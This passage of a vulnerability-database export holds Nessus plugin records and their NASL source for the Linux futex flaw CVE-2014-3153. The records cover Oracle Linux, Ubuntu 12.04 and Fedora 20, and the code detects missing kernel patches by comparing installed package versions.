Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3039\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-headers-2.6.32-400.36.2.el5uek\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.2.el5uek-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mlnx_en-2.6.32-400.36.2.el5uekdebug-1.5.7-2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.2.el5uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"ofa-2.6.32-400.36.2.el5uekdebug-1.5.1-4.0.58\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-headers-2.6.32-400.36.2.el6uek\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.2.el6uek-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mlnx_en-2.6.32-400.36.2.el6uekdebug-1.5.7-0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.2.el6uek-1.5.1-4.0.58\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ofa-2.6.32-400.36.2.el6uekdebug-1.5.1-4.0.58\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-2237-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2237-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74357", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2237-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74357);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_xref(name:\"USN\", value:\"2237-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-2237-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2237-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2237-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-51-generic\", pkgver:\"3.5.0-51.77~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-2238-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2238-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74358", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2238-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74358);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2013-4483\", \"CVE-2014-3153\");\n script_bugtraq_id(63445);\n script_xref(name:\"USN\", value:\"2238-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-2238-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2238-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4483\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2238-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-42-generic\", pkgver:\"3.8.0-42.62~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:12:55", "description": "The 3.14.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-12T00:00:00", "title": "Fedora 20 : kernel-3.14.6-200.fc20 (2014-7128)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3940", "CVE-2014-3153"], "modified": "2014-06-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-7128.NASL", "href": "https://www.tenable.com/plugins/nessus/74478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7128.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74478);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3153\", \"CVE-2014-3940\");\n script_bugtraq_id(67786, 67906);\n script_xref(name:\"FEDORA\", value:\"2014-7128\");\n\n script_name(english:\"Fedora 20 : kernel-3.14.6-200.fc20 (2014-7128)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1103626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1104097\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134250.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b80bb35d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.14.6-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel.\nGuest OS users could exploit this flaw to cause a denial of service\n(host OS crash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory\nmanagement subsystem. An unprivileged local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2014-3122).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2235-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2235-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74356", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2235-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74356);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-0055\", \"CVE-2014-3122\", \"CVE-2014-3153\");\n script_bugtraq_id(66441, 67162);\n script_xref(name:\"USN\", value:\"2235-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2235-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel.\nGuest OS users could exploit this flaw to cause a denial of service\n(host OS crash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory\nmanagement subsystem. An unprivileged local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2014-3122).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2235-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) 